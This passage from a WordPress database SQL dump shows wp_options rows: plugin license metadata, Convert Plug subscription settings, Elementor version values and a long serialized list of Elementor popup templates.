websites.\";s:7:\"version\";s:7:\"3.19.14\";s:12:\"download_url\";s:0:\"\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"tested\";s:3:\"6.0\";s:14:\"privacy_policy\";s:132:\"https://store.brainstormforce.com/privacy-policy/?utm_source=license-form&utm_medium=privacy-policy&utm_campaign=graupi-license-form\";s:16:\"terms_conditions\";s:144:\"https://store.brainstormforce.com/terms-and-conditions/?utm_source=license-form&utm_medium=terms-and-conditions&utm_campaign=graupi-license-form\";s:12:\"purchase_url\";s:74:\"https://codecanyon.net/cart/add_items?item_ids=6892199&ref=BrainstormForce\";s:13:\"changelog_url\";s:47:\"https://ultimate.brainstormforce.com/changelog/\";s:4:\"type\";s:6:\"plugin\";s:8:\"in_house\";s:4:\"true\";s:9:\"on_market\";s:4:\"true\";s:15:\"is_product_free\";s:5:\"false\";s:14:\"has-extensions\";s:5:\"false\";s:13:\"support_forum\";s:37:\"http://brainstormforce.freshdesk.com/\";s:25:\"after_registration_action\";s:0:\"\";s:13:\"product_image\";s:65:\"//support.brainstormforce.com/wp-content/uploads/2017/07/uavc.jpg\";s:32:\"show_on_register_licence_listing\";s:4:\"true\";s:15:\"show_on_listing\";s:4:\"true\";s:13:\"is_support_on\";s:4:\"true\";s:14:\"envato_item_id\";s:7:\"6892199\";s:8:\"template\";s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";s:6:\"remote\";s:7:\"3.19.19\";s:12:\"purchase_key\";s:0:\"\";s:6:\"status\";s:14:\"not-registered\";s:7:\"message\";s:0:\"\";s:12:\"product_name\";s:41:\"Ultimate Addons for WPBakery Page Builder\";}}}','yes'),
(196,'smile_lists','a:1:{i:0;a:5:{s:4:\"date\";s:10:\"03-10-2022\";s:9:\"list-name\";s:5:\"First\";s:13:\"list-provider\";s:12:\"Convert Plug\";s:4:\"list\";s:0:\"\";s:13:\"provider_list\";s:0:\"\";}}','yes'),
(197,'convert_plug_settings','a:28:{s:19:\"cp-enable-mx-record\";s:1:\"0\";s:19:\"cp-default-messages\";s:1:\"1\";s:21:\"cp-already-subscribed\";s:22:\"Already Subscribed...!\";s:15:\"cp-double-optin\";s:1:\"1\";s:13:\"cp-gdpr-optin\";s:1:\"1\";s:13:\"cp-sub-notify\";s:1:\"0\";s:12:\"cp-sub-email\";s:20:\"ay.zaghweb@gmail.com\";s:12:\"cp-email-sub\";s:43:\"Congratulations! You have a New Subscriber!\";s:15:\"cp-google-fonts\";s:1:\"1\";s:11:\"cp-timezone\";s:9:\"wordpress\";s:15:\"user_inactivity\";s:2:\"60\";s:18:\"cp-edit-style-link\";s:1:\"0\";s:17:\"cp-plugin-support\";s:1:\"0\";s:21:\"cp-disable-impression\";s:1:\"0\";s:15:\"cp-close-inline\";s:1:\"0\";s:18:\"cp-disable-storage\";s:1:\"0\";s:14:\"cp-disable-pot\";s:1:\"1\";s:17:\"cp-disable-domain\";s:1:\"0\";s:14:\"cp-domain-name\";s:0:\"\";s:11:\"cp-lazy-img\";s:1:\"0\";s:16:\"cp-close-gravity\";s:1:\"1\";s:11:\"cp-load-syn\";s:1:\"0\";s:16:\"cp_change_ntf_id\";s:1:\"1\";s:18:\"cp_notify_email_to\";s:20:\"ay.zaghweb@gmail.com\";s:14:\"cp-access-role\";s:0:\"\";s:12:\"cp-user-role\";s:13:\"administrator\";s:16:\"cp-new-user-role\";s:0:\"\";s:13:\"cp-email-body\";s:0:\"\";}','yes'),
(198,'cp_new_bg_type','1','yes'),
(199,'bsf_last_update_check','1698159235','yes'),
(202,'elementor_active_kit','7','yes'),
(205,'elementor_version','3.7.8','yes'),
(206,'elementor_install_history','a:1:{s:5:\"3.7.8\";i:1664832994;}','yes'),
(207,'elementor_events_db_version','1.0.0','no'),
(211,'the7_last_dynamic_stylesheets_hash','9397db14b17e8f18c871f954a3f52088','yes'),
(212,'presscore_less_css_is_writable','1','yes'),
(213,'the7_dynamic_css_cache','a:0:{}','yes'),
(214,'the7_dynamic_css_version','5182e553dc22','yes'),
(220,'elementor_onboarded','1','yes'),
(223,'_elementor_installed_time','1664833009','yes'),
(224,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:3:{s:5:\"block\";a:1:{s:10:\"categories\";a:22:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:14:\"call to action\";i:4;s:7:\"clients\";i:5;s:7:\"contact\";i:6;s:3:\"faq\";i:7;s:8:\"features\";i:8;s:6:\"footer\";i:9;s:6:\"header\";i:10;s:4:\"hero\";i:11;s:9:\"portfolio\";i:12;s:7:\"pricing\";i:13;s:15:\"product archive\";i:14;s:8:\"services\";i:15;s:11:\"single page\";i:16;s:11:\"single post\";i:17;s:14:\"single product\";i:18;s:5:\"stats\";i:19;s:9:\"subscribe\";i:20;s:4:\"team\";i:21;s:12:\"testimonials\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}s:2:\"lp\";a:1:{s:10:\"categories\";a:15:{i:0;s:8:\"Business\";i:1;s:16:\"Coming Soon Page\";i:2;s:9:\"eCommerce\";i:3;s:9:\"Education\";i:4;s:6:\"Events\";i:5;s:18:\"Health and Fitness\";i:6;s:3:\"NFT\";i:7;s:14:\"Online Service\";i:8;s:7:\"Product\";i:9;s:11:\"Real Estate\";i:10;s:18:\"Social Involvement\";i:11;s:14:\"Thank You Page\";i:12;s:6:\"Travel\";i:13;s:18:\"Under Construction\";i:14;s:9:\"Wireframe\";}}}s:10:\"categories\";a:22:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:14:\"call to action\";i:4;s:7:\"clients\";i:5;s:7:\"contact\";i:6;s:3:\"faq\";i:7;s:8:\"features\";i:8;s:6:\"footer\";i:9;s:6:\"header\";i:10;s:4:\"hero\";i:11;s:9:\"portfolio\";i:12;s:7:\"pricing\";i:13;s:15:\"product archive\";i:14;s:8:\"services\";i:15;s:11:\"single page\";i:16;s:11:\"single post\";i:17;s:14:\"single product\";i:18;s:5:\"stats\";i:19;s:9:\"subscribe\";i:20;s:4:\"team\";i:21;s:12:\"testimonials\";}s:9:\"templates\";a:825:{i:0;a:16:{s:4:\"tmpl\";i:1280;s:2:\"id\";i:22403;s:5:\"title\";s:40:\"Hello Bar | Subscribe | Aesthetic Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/aesthetic-clinic-19.jpg\";s:12:\"tmpl_created\";i:1647354307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/hello-bar-subscribe-aesthetic-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:48:\"[\"Barbershop\",\"Business\",\"Discount\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:1;a:16:{s:4:\"tmpl\";i:1281;s:2:\"id\";i:22410;s:5:\"title\";s:32:\"Fly-In | Discount | Hair Stylist\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/hair-stylist-20.jpg\";s:12:\"tmpl_created\";i:1647354614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-discount-hair-stylist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Barbershop\",\"Discount\",\"Hair\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:2;a:16:{s:4:\"tmpl\";i:1285;s:2:\"id\";i:22440;s:5:\"title\";s:32:\"Classic | Subscribe | Shoe Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/shoes-store-21.jpg\";s:12:\"tmpl_created\";i:1647418620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-subscribe-shoe-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:37:\"[\"Ecommerce\",\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:3;a:16:{s:4:\"tmpl\";i:1286;s:2:\"id\";i:22446;s:5:\"title\";s:37:\"Full Screen | Subscribe | Denim Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/denim-store-22.jpg\";s:12:\"tmpl_created\";i:1647419614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/full-screen-subscribe-denim-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:4;a:16:{s:4:\"tmpl\";i:1287;s:2:\"id\";i:22452;s:5:\"title\";s:37:\"Fly-In | Subscribe | Pizza Restaurant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/pizza-restaurant-23.jpg\";s:12:\"tmpl_created\";i:1647420733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-subscribe-pizza-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:19:\"[\"Business\",\"Food\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:5;a:16:{s:4:\"tmpl\";i:1288;s:2:\"id\";i:22458;s:5:\"title\";s:38:\"Full Screen | Subscribe | Fashion Shop\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-shop-24.jpg\";s:12:\"tmpl_created\";i:1647426379;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-subscribe-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Ecommerce\",\"Fashion\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:6;a:16:{s:4:\"tmpl\";i:1289;s:2:\"id\";i:22464;s:5:\"title\";s:32:\"Fly-In | Contact | Makeup Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/makeup-studio-25.jpg\";s:12:\"tmpl_created\";i:1647427026;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-makeup-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:7;a:16:{s:4:\"tmpl\";i:1290;s:2:\"id\";i:22470;s:5:\"title\";s:32:\"Fly-In | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-26.jpg\";s:12:\"tmpl_created\";i:1647428250;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:8;a:16:{s:4:\"tmpl\";i:1291;s:2:\"id\";i:22480;s:5:\"title\";s:27:\"Classic | CTA | MasterClass\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/master-class-27.jpg\";s:12:\"tmpl_created\";i:1647428474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-masterclass/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"cta\",\"Magazine\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:9;a:16:{s:4:\"tmpl\";i:1292;s:2:\"id\";i:22489;s:5:\"title\";s:29:\"Classic | CTA | Music Concert\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/music-concert-29.jpg\";s:12:\"tmpl_created\";i:1647429738;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-music-concert/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"cta\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:10;a:16:{s:4:\"tmpl\";i:1293;s:2:\"id\";i:22495;s:5:\"title\";s:27:\"Classic | CTA | Music Album\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/music-album-30.jpg\";s:12:\"tmpl_created\";i:1647430056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-music-album/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Ba\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:11;a:16:{s:4:\"tmpl\";i:1294;s:2:\"id\";i:22501;s:5:\"title\";s:37:\"Fly-In | CTA | Photography Exhibition\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/photography-exhibition-31.jpg\";s:12:\"tmpl_created\";i:1647430512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-photography-exhibition/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:12;a:16:{s:4:\"tmpl\";i:1295;s:2:\"id\";i:22507;s:5:\"title\";s:34:\"Classic | CTA | Clothing Shop Sale\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/clothing-shop-sale-32.jpg\";s:12:\"tmpl_created\";i:1647430774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-cta-clothing-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:13;a:16:{s:4:\"tmpl\";i:1296;s:2:\"id\";i:22486;s:5:\"title\";s:30:\"Classic | CTA | Shop Promotion\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/shop-promotion-28.jpg\";s:12:\"tmpl_created\";i:1647430951;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-shop-promotion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"cta\",\"Magazine\",\"Photography\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:14;a:16:{s:4:\"tmpl\";i:1297;s:2:\"id\";i:22516;s:5:\"title\";s:32:\"Fly-In | CTA | Glasses Shop Sale\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/glasses-shop-sale-33.jpg\";s:12:\"tmpl_created\";i:1647431136;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-cta-glasses-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:30:\"[\"Business\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:15;a:16:{s:4:\"tmpl\";i:1298;s:2:\"id\";i:22522;s:5:\"title\";s:30:\"Fly-In | Discount | Skate Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/50-skate-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647434058;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-skate-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:16;a:16:{s:4:\"tmpl\";i:1299;s:2:\"id\";i:22532;s:5:\"title\";s:43:\"Classic | Subscription | Basketball Academy\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/21-basketball-academy-Subscription.jpg\";s:12:\"tmpl_created\";i:1647434608;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/classic-subscription-basketball-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Education\",\"Marketing\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:17;a:16:{s:4:\"tmpl\";i:1300;s:2:\"id\";i:22543;s:5:\"title\";s:38:\"Classic | Discount | Veterinary Clinic\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/veterinery-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647435581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-discount-veterinary-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Discount\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:18;a:16:{s:4:\"tmpl\";i:1301;s:2:\"id\";i:22553;s:5:\"title\";s:39:\"Classic | Contact | Business Consulting\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/27-business-consulting-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647439935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/classic-contact-business-consulting/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:19;a:16:{s:4:\"tmpl\";i:1302;s:2:\"id\";i:22562;s:5:\"title\";s:28:\"Classic | Contact | Handyman\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/handyman-small.jpg\";s:12:\"tmpl_created\";i:1647440333;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-contact-handyman/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:20;a:16:{s:4:\"tmpl\";i:1303;s:2:\"id\";i:22573;s:5:\"title\";s:40:\"Classic | Discount | Online Fashion Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/31-online-fashion-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647462549;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-online-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:21;a:16:{s:4:\"tmpl\";i:1304;s:2:\"id\";i:22583;s:5:\"title\";s:36:\"Fly-In | Discount | Personal Trainer\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/personal-trainer-small.jpg\";s:12:\"tmpl_created\";i:1647503781;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-personal-trainer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:22;a:16:{s:4:\"tmpl\";i:1305;s:2:\"id\";i:22592;s:5:\"title\";s:41:\"Classic | Contact | Illustrator Portfolio\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/illustrator-protfolio-small.jpg\";s:12:\"tmpl_created\";i:1647504218;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-contact-illustrator-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:49:\"[\"Contact\",\"Creative Portfolio\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:23;a:16:{s:4:\"tmpl\";i:1306;s:2:\"id\";i:22602;s:5:\"title\";s:46:\"Bottom Bar | Discount | Handmade Ceramics Shop\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2022/03/handmade-ceramic-shop-36-small.jpg\";s:12:\"tmpl_created\";i:1647507007;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-ceramics-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:48:\"[\"Business\",\"cta\",\"Ecommerce\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:24;a:16:{s:4:\"tmpl\";i:1307;s:2:\"id\";i:22612;s:5:\"title\";s:51:\"Classic | Contact | Classic Car Restoration Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/restoration-car-shop-37-small.jpg\";s:12:\"tmpl_created\";i:1647507310;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/classic-contact-classic-car-restoration-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:25;a:16:{s:4:\"tmpl\";i:1308;s:2:\"id\";i:22621;s:5:\"title\";s:30:\"Classic | Booking | Life Coach\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/38-life-coach-Booking.jpg\";s:12:\"tmpl_created\";i:1647508596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-booking-life-coach/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Booking\",\"Business\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:26;a:16:{s:4:\"tmpl\";i:1309;s:2:\"id\";i:22632;s:5:\"title\";s:42:\"Classic |  Subscription | Merchandise 